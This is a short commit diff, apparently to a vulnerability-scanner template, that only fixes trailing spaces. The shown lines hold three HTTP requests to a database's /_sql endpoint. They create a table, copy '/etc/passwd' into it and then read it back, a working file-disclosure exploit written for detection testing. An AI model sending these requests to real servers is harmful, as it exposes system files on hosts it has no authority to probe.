trail space fix

patch-4
Dhiyaneshwaran 2024-06-18 15:45:36 +05:30 committed by GitHub
parent d661e74400
commit db0dd54146
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 3 additions and 3 deletions

View File

@ -31,21 +31,21 @@ http:
POST /_sql?types HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json; charset=UTF-8
{"stmt":"CREATE TABLE {{table_name}}(info_leak STRING)"}
- |
POST /_sql?types HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json; charset=UTF-8
{"stmt":"COPY {{table_name}} FROM '/etc/passwd' with (format='csv', header=false)"}
- |
POST /_sql?types HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json; charset=UTF-8
{"stmt":"SELECT * FROM {{table_name}} limit 100"}
matchers-condition: and